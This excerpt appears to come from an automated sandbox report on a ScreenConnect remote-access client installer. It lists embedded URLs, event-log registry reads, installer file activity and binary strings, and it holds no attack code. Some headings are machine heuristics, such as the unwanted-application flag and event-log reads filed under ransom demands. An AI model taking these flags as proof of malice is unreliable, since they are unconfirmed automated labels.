                                  Source: ScreenConnect.WindowsClient.exe, 0000000B.00000002.1167794308.0000000013470000.00000004.00000800.00020000.00000000.sdmp, Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                  Source: edb.log.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/advqtdv6t35gmqvdg3dzxo4krmzq_117.0.5938.149/117.0.5
                                  Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                  Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                  Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                  Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                  Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                  Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.2321754892.000000000240B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000005.00000003.1074517590.0000000004DDF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1079266579.0000000004CD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1074517590.0000000004E4E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: svchost.exe, 0000000D.00000002.1368208506.0000016E2D824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1366957520.0000016E2D822000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                                  Source: Support.ClientSetup.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                                  Source: svchost.exe, 0000000D.00000002.1368595211.0000016E2D882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                                  Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                                  Source: svchost.exe, 0000000D.00000003.1366443338.0000016E2D887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367129633.0000016E2D821000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                                  Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368525737.0000016E2D864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: svchost.exe, 0000000D.00000003.1367377143.0000016E2D84E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000002.1368177362.0000016E2D81D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1366780410.0000016E2D861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1366905237.0000016E2D85D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                                  Source: svchost.exe, 0000000D.00000003.1366709944.0000016E2D86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                                  Source: svchost.exe, 0000000D.00000003.1366738631.0000016E2D866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                                  Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                                  Source: svchost.exe, 0000000C.00000003.1202799313.0000027972D00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                                  Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic
                                  Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualea
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                                  Source: svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367151955.0000016E2D850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000002.1368110330.0000016E2D813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                                  Source: svchost.exe, 0000000D.00000002.1368378344.0000016E2D83F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1367273272.0000016E2D83C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tilx
                                  Source: svchost.exe, 0000000D.00000003.1366660793.0000016E2D86D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                                  Source: svchost.exe, 0000000D.00000003.1367186128.0000016E2D81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Reads the Security eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Reads the System eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Detected potential unwanted application
                                  Source: Support.ClientSetup.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EF2280 CreateProcessAsUserW,8_2_05EF2280
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b7ed5.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8185.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8195.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI837B.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b7ed7.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3b7ed7.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{F9AF0EC3-4E4A-7A37-BF0D-BE8AA2267E73}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)\k5npgvlj.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a9232c38f7080cfd)\k5npgvlj.newcfgJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI8195.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F487D80_2_05F487D8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F4BA500_2_05F4BA50
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F487C80_2_05F487C8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F60CB80_2_05F60CB8
                                  Source: C:\Users\user\Desktop\Support.ClientSetup.exeCode function: 0_2_05F61E9B0_2_05F61E9B
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_01FED5888_2_01FED588
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EF00408_2_05EF0040
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exeCode function: 8_2_05EF00408_2_05EF0040
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3B70CB9_2_00007FF9CC3B70CB
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3C24389_2_00007FF9CC3C2438
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3B13879_2_00007FF9CC3B1387
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC3BDB859_2_00007FF9CC3BDB85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC6C5D619_2_00007FF9CC6C5D61
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF9CC6C6F209_2_00007FF9CC6C6F20
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3C0DFD11_2_00007FF9CC3C0DFD
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3C0EA311_2_00007FF9CC3C0EA3
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3CDB8511_2_00007FF9CC3CDB85
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC3C138711_2_00007FF9CC3C1387
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6DE52611_2_00007FF9CC6DE526
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D5D6611_2_00007FF9CC6D5D66
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6DF2D211_2_00007FF9CC6DF2D2
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D6ECA11_2_00007FF9CC6D6ECA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D2EA011_2_00007FF9CC6D2EA0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exeCode function: 11_2_00007FF9CC6D6FE911_2_00007FF9CC6D6FE9
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1069364194.00000000036F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1069090170.0000000001D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1080490569.00000000084DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073419891.0000000005D50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1074872097.000000000617C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1073100351.0000000005CC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.000000000116F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000000.1057907517.000000000116F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1080391805.0000000007470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1080391805.0000000007470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exe, 00000000.00000002.1072189610.000000000493E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Support.ClientSetup.exe
                                  Source: Support.ClientSetup.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Support.ClientSetup.exe
